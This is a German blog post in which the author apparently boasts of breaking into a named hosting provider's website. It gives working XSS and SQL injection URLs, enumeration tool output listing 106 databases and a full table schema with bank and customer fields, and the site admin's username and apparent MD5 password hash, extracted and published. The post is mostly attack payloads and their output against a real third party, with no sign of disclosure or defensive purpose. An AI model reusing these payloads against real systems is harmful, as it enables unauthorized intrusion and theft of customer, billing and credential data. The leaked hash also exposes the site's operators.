J0hn.X3r

Hab heut nach langer Zeit mal wieder eine SQL Injection durchgefuehrt, drauf gestoßen bin ich durch KoC seinem 1337 XSSed Profil.

Geht um die Seite Server-Crew.com – hier mal eine XSS Luecke:

http://server-crew.com/server-crew/index.php?show=

Dann dachte ich mir “wo ne XSS ist, wird auch nicht weit entfernt ne andere Vuln sein :P”, also paar Sekunden weiter gesucht und auf etwas gestoßen:

http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/version()-- f

Ausgabe:

5.0.32-Debian_7etch11

Nett. 🙂

Hab mir paar Dinge ausgeben lassen.. hab dann schnell gemerkt das dort einige DB’s sind. Daher nen Script benutzt (ich weiß, lame usw. Aber da ich die SQL Injection ja gefunden hab sollte das Script nur ein bisschen arbeit abnehmen ;))

Hier die Datenbanken:

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                 v4.0  |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL:http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: gcp
	User: root@localhost
	Version: 5.0.32-Debian_7etch11
[+] Showing all databases current user has access too!
[+] Number of Databases: 106

[0]confixx
[1]gcp
[2]mumble
[3]mysql
[4]tss_13
[5]tss_9
[6]usr_web0_1
[7]usr_web0_2
[8]usr_web0_3
[9]usr_web0_4
[10]usr_web0_6
[11]usr_web0_8
[12]usr_web10_1
[13]usr_web12_1
[14]usr_web13_1
[15]usr_web14_1
[16]usr_web16_1
[17]usr_web17_1
[18]usr_web19_1
[19]usr_web19_2
[20]usr_web19_3
[21]usr_web19_4
[22]usr_web19_5
[23]usr_web1_1
[24]usr_web1_10
[25]usr_web1_11
[26]usr_web1_2
[27]usr_web1_3
[28]usr_web1_4
[29]usr_web1_5
[30]usr_web1_6
[31]usr_web1_7
[32]usr_web1_8
[33]usr_web1_9
[34]usr_web20_1
[35]usr_web21_1
[36]usr_web21_2
[37]usr_web21_3
[38]usr_web21_4
[39]usr_web21_5
[40]usr_web22_1
[41]usr_web23_1
[42]usr_web24_1
[43]usr_web26_1
[44]usr_web26_2
[45]usr_web28_1
[46]usr_web28_2
[47]usr_web29_1
[48]usr_web29_3
[49]usr_web2_1
[50]usr_web30_1
[51]usr_web30_2
[52]usr_web30_3
[53]usr_web30_4
[54]usr_web30_5
[55]usr_web31_1
[56]usr_web32_1
[57]usr_web33_1
[58]usr_web34_1
[59]usr_web34_2
[60]usr_web35_1
[61]usr_web37_1
[62]usr_web39_1
[63]usr_web39_2
[64]usr_web39_3
[65]usr_web39_4
[66]usr_web39_5
[67]usr_web39_6
[68]usr_web39_7
[69]usr_web3_1
[70]usr_web40_1
[71]usr_web40_2
[72]usr_web41_1
[73]usr_web41_2
[74]usr_web41_3
[75]usr_web43_1
[76]usr_web43_2
[77]usr_web44_1
[78]usr_web44_2
[79]usr_web46_1
[80]usr_web46_2
[81]usr_web47_1
[82]usr_web47_2
[83]usr_web47_3
[84]usr_web48_1
[85]usr_web49_1
[86]usr_web50_1
[87]usr_web50_2
[88]usr_web50_3
[89]usr_web50_4
[90]usr_web52_1
[91]usr_web52_2
[92]usr_web53_1
[93]usr_web54_1
[94]usr_web5_1
[95]usr_web5_2
[96]usr_web62_1
[97]usr_web62_2
[98]usr_web67_1
[99]usr_web8_1
[100]usr_web9_1
[101]usr_web9_2
[102]usr_web9_3
[103]usr_web9_4
[104]usr_web9_5
[105]usr_web9_6

Wer benutzt normalerweise “User: root@localhost“? Ist das nicht ein Sicherheitsrisiko? Anstatt das man nen eigenen User fuer die Page erstellt, alles ueber root machen?!

Doof.

Hier die Tabellen & Columns von der gcp DB:

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                 v4.0  |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                 v4.0  |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL:http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: gcp
	User: root@localhost
	Version: 5.0.32-Debian_7etch11
[+] Showing Tables & Columns from database "gcp"
[+] Number of Tables: 91

[Database]: gcp
[Table: Columns]
[0]host_accounts: host_id,server_id,clan_id,insystem,aktiv,suspend,remove,passwd,mysql_pw,hd_quota,base_host,traffic,error,webalizer,auto_pay
[1]host_application: app_id,app_status,app_on_server,port_id,server_id,server_ip,maxplayers,server_type,ftp_passwd,ftp_login,quota,standby,game,game_group,server_type2,maxusers,webdownload,app_load,app_load_new,error_status,server_start,first_use,to_restart
[2]host_billing_accounts: account_id,account_name,account_owner,account_number,bank_number,account_currency,account_type,account_saldo
[3]host_billing_bills: bill_id,bill_customer,bill_date,bill_due_date,bill_content,bill_amount,bill_payment,bill_tax,bill_status,bill_payment_status
[4]host_billing_bills_orders: bill_id,order_id
[5]host_billing_imports: import_id,import_name,import_type,import_field_sep,import_field_start,import_field_posting_text,import_field_saldo,import_field_account,import_field_amount,import_field_date,import_field_date_format,import_field_currency,import_field_reason1,import_field_reason2,import_field_reason3,import_field_reason4,import_field_reason5
[6]host_billing_reminder: reminder_id,user_id,content,reminder_mail,reminder_post,reminder_amount
[7]host_billing_to_export: bill_id,exp_mail,exp_post,exp_print,exp_billing,exp_ec,exp_cc,exp_edit,exp_cancel,exp_delete
[8]host_billing_transactions: transaction_id,transaction_date,transaction_currency,transaction_amount,transaction_account,transaction_reason,transaction_posting_text,transaction_bank_account,transaction_key,transaction_hide,transaction_customer,transaction_bill,transaction_ignore,transaction_special,transaction_credit,transaction_credit_export,transaction_credit_id
[9]host_errors: error_id,server_id,error_cat,error_typ,error_msg,time
[10]host_events: event_id,server_id,event_typ,error_type,event_times,solved,target,error_id,content,content_show_user,modul,modul_id,time_start,time_last,time_solved,event_user,user_id,rep,process_id
[11]host_gameserver: gs_id,gs_status,gs_on_server,port_id,server_id,server_ip,maxplayers,server_type,ftp_passwd,standby,game,game_group,server_type2,maxusers,gs_load,gs_load_new,error_status,server_start,quota,webdownload,first_use,to_restart,timeserver,timeserver_last_check,timeserver_time_empty
[12]host_gs_admins: user_id,master,software,kunden,sources,join_iface,zahlungen,support,server,accounting_admin,accounting_view,accounting_edit,accounting_bill,support_server,support_kunden,events,news,notes1,notes2,newsletter
[13]host_gs_admins_notify: user_id,event_id,notify_status
[14]host_gs_aktuell: gs_id,game_id,mod_id,config_id,copy_config,modul_id,modul,process_id
[15]host_gs_checks: check_name,check_mode,check_value,check_type,modul_id,modul
[16]host_gs_config_file_defaults: config_file,config_group,os,text,mod_id,plugin_id,imp,parts_order
[17]host_gs_config_files: config_file,file,vars,game_id,mod_id,plugin_id,use_sections,section_start,section_end,section_num,filter_double
[18]host_gs_config_files_regexp: regexp_id,config_id,regexp_order,pattern,split,name,dels,imp
[19]host_gs_configs: gs_id,config_id,game_id,mod_id,name,info,last_change,modul_id,modul,process_id
[20]host_gs_dependency: dep_id,software_id,game_id,mod_id,plugin_id,version,typ,imp
[21]host_gs_games: game_id,game,game_name,game_group,default_port,port_offset,qport,qport_offset,qstat_opt,aktiv
[22]host_gs_installed: gs_id,game_id,mod_id,plugin_id,version,modul_id,process_id,modul,autoupdate
[23]host_gs_layout: page_id,mod_id,game_id,page_order,imp
[24]host_gs_layout_field_defaults: field_id,page_id,field_default,text_default,imp
[25]host_gs_layout_field_script: page_id,field_id,script,imp
[26]host_gs_layout_field_text: field_id,kommentar,imp
[27]host_gs_layout_field_values: field_id,gs_id,value,text,config_id,value_key
[28]host_gs_layout_field_vars: field_id,var,value,imp,var_key
[29]host_gs_layout_fields: field_id,page_id,field_os,mod_id,plugin_id,field_desc,name,field_regexp,field_mode,count,config_id,field_group,size,field_type,split,field_order,real_name,script,min,max,step,syntax,einheit,force_enter,default_enter,runtime_replace
[30]host_gs_layout_fields_check: field_id,check_name,check_console_send,check_console_recv,check_console_recv_pos,check_qstat_var,check_plugin_name,check_reaction_nostart,check_reaction_stop,check_reaction_suspend,check_reaction_notify_customer
[31]host_gs_layout_pages: page_id,name,page_type,php_file,aktiv,dir,info,script,imp_id
[32]host_gs_mappool: map_id,map_name,map_datum,map_cat,map_mod,map_win,map_linux,map_comment,map_os
[33]host_gs_mappool_cats: cat_id,mod_id,cat_name,cat_short
[34]host_gs_mappool_files: map_id,files,file_win,file_linux
[35]host_gs_mappool_installed: map_id,gs_id,mod_id,modul,modul_id
[36]host_gs_mods: mod_id,game_id,mod,mod_name,executable,executable_win,params,params_win,standartmap,gamedir,gamedir_win,mapdir,mapdir_win,logdir,logdir_win,execdir,execdir_win,aktiv,webcache,webcache_win
[37]host_gs_plugins: plugin_id,mod_id,game_id,plugin,plugin_name,plugin_typ,aktiv
[38]host_gs_server: server_id,server_ip,ftp_user,ftp_passwd,location,source_server,short_desc,load_max,load_act,os,content_url,ip_start,ip_end,error_status,arch,webdownload_url
[39]host_gs_server_software: server_id,modul
[40]host_gs_software: software_id,game_id,mod_id,plugin_id,version,standart_mods,standart_plugins,extract_dir,remove_path,kommentar,extract_dir_win,remove_path_win,aktiv,install_mode
[41]host_gs_users: gs_id,user_id,admin,config,ftp,user_game,stop,show_varnames
[42]host_host_stats: up,lastupdate,bin,bout,cpu,load1,load2,load3,ram,swap,procs_run,procs_sleep,temp1,temp2,temp3,temp4,fan1,fan2,fan3,fan4,server_id
[43]host_ips: ip_id,ip,ip1,ip2,ip3,ip4,server_id
[44]host_jobs: job_id,pid,job_type,job_server,job_status,prozent,name,job_daten,entered,started
[45]host_kunden: user_id,aktiv,k_alt,k_ansprache,k_vorname,k_nachname,k_strasse,k_plz,k_ort,k_land,k_geburtsdatum,k_tele,k_handy,k_fax,k_bank_inhaber,k_bank_kto_nr,k_bank_blz,k_bank_name,k_bank_zahlung,k_info,paypal_email,bill_tax,bill_post,bill_email_send,bill_text,bill_email
[46]host_kunden_bestellungen: bestellungs_id,user_id,produkt_id,tarif_id,features,bestell_time,erstfreischalt_zeit,kuendigungs_zeit,rechnungs_zeit,sponsoring,freigeschaltet,zahlungs_status,abrechnungsraum,letzte_rechnung,new,new_time,tarif_id_new,features_new,abrechnungsraum_new,tarif_id_set,features_set,abrechnungsraum_set,contract_term,first_bill,individual_monthly_price,individual_price_setup,individual_price_setup_set,individual_monthly_price_set,produkt_id_set,next_set,individual_price_setup_new,individual_monthly_price_new,produkt_id_new,order_ip
[47]host_kunden_bestellungen_features: bestell_id,feature_id,feature_status,setting
[48]host_kunden_bestellungen_indiv: bestell_id,temp_id,settings,status
[49]host_kunden_bestellungen_module: bestellungs_id,modul,modul_id,modul_nocheck,feature_id
[50]host_kunden_bestellungen_old: bestellungs_id,user_id,produkt_id,tarif_id,features,more_data,bemerkung,bestell_time,erstfreischalt_zeit,kuendigungs_zeit,freigeschaltet,zahlungs_status,abrechnungsraum
[51]host_kunden_konto: kunden_id,kontostand,last_change
[52]host_kunden_konto_zahlungen: zahlungs_id,kunden_id,betrag,typ,zweck,bemerkung,zeit,removed,rechnungs_id
[53]host_kunden_rechnungen: rechnungs_id,kunden_id,datum,rechnung,bezahlt,time,mail_send
[54]host_mail_queue: mail_id,mail_date,mail_to,mail_header,mail_subject,mail_body,event_id,mail_last_try
[55]host_module_checks: modul_id,modul,check_name,check_mode,check_value,check_type
[56]host_module_info_text: user_id,modul,modul_id,info_date,info_subject,info_text
[57]host_module_settings: server_id,setting,value,modul
[58]host_module_users: user_id,modul,modul_id,user_setting,user_value
[59]host_mysql: mysql_id,host_id,server_id,new,del
[60]host_news: news_id,user_id,news_datum,news_titel,news_text,news_force,news_public,news_replies
[61]host_news_com: com_id,news_id,com_datum,com_user,com_text,com_ip
[62]host_news_links: link_id,news_id,link_url,link_name
[63]host_php_ini: host_id,ini_var,ini_val
[64]host_produkt_feature_sets: feature_grp,feature_input,feature_display,feature_setting
[65]host_produkt_features: feature_id,tarif_id,feature_grp,feature_name,feature_preis,feature_preis_einmalig,feature_einstellung,feature_order,feature_status,feature_input
[66]host_produkt_tarife: tarif_id,produkt_id,tarif_name,tarif_desc,tarif_anzeigen,tarif_settings_show,tarif_order
[67]host_produkt_zusatz: zusatz_id,produkt_id,zusatz_text
[68]host_produkte: produkt_id,produkt_name,produkt_desc,produkt_games,produkt_anzeigen,produkt_grp,produkt_order
[69]host_server: server_id,server_ip,aktiv,host_space,template_acc,hosting,cluster,cluster_url
[70]host_sessions: session_id,user_id,ip,start,end,lang,session_server
[71]host_status_gameserver: gs_id,server_time,server_ip,server_port,server_qport,server_name,server_players,server_players_max,server_map,server_response,server_game,server_mod
[72]host_support_idents: ident_id,ident_user,ident_key,ident,ident2
[73]host_support_logs: log_id,log_type,log_key,log_date,log_type_id,log_user_id,log_subject
[74]host_support_logs_text: log_id,log_text
[75]host_support_notes: note_id,note_date,note_admin,note_text,note_key,note_todo,note_todo_status,note_todo_admin,note_todo_date,note_todo_date_done
[76]host_support_sessions: chat_id,user_id,time_start,time_end,chat_auth,chat_type,support_cat,user_ident,support_status,last_change,im_status
[77]host_support_sessions_supporters: user_id,login_key,last_online,online_since,time_last,user_status,online_status,last_change,admin_ip,admin_host
[78]host_support_sessions_text: msg_id,chat_id,user_ident,msg_time,msg_text
[79]host_support_sessions_users: chat_id,user_ident,user_id,user_ip,time_last,last_msg,user_name,user_status,user_admin,user_invis
[80]host_teamspeak: ts_id,ts_status,ts_load,port,server_id,process_id,server_desc,slots,codec_celp51,codec_celp63,codec_gsm148,codec_gsm164,codec_windowscelp52,codec_speex2150,codec_speex3950,codec_speex5950,codec_speex8000,codec_speex11000,codec_speex15000,codec_speex18200,codec_speex24600
[81]host_teamspeak_server: process_id,ts_status,server_id,server_ip,port_id,config_id,config_id_global,max_servers,max_slots,ftp_passwd,mysql_passwd,first_start,to_restart,server_start
[82]host_tickets: ticket_id,start,end,last,user_id,admin_id,replies,public,topic,rubrik,prioritaet,stat
[83]host_tickets_posts: post_id,ticket_id,user_id,post_time,post_ip,post_text
[84]host_tickets_rubriken: rubrik_id,rubrik_name
[85]host_todo: host_id,server_id,apache,mysql,php,ftp
[86]host_traffic: host_id,base_host,akt_traffic,ftp_traffic,cpmb,bezahlt
[87]host_traffic_ip: server_ip,zeit,bin,bout,hold
[88]host_updates: ident,version,datum
[89]host_users: user_id,username,user_password,user_actkey,user_newpasswd,user_level,user_last_login,user_last_ip
[90]host_users_details: user_id

Wenn wir nun unsere SQL Injection anpassen:

http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/concat_ws(0x3a,username,user_password)/**/FROM/**/gcp.host_users/**/LIMIT/**/0,1-- f

Dann ist unsere Ausgabe:

admin:97b6e1f38fe6c69d0057860f5e0e2105

Scheint aufm ersten Blick nen MD5 PW zu sein. Pwned?! Pwned! 😀

Najo, mehr werd ich da auch nicht machen, viel Spaß 😉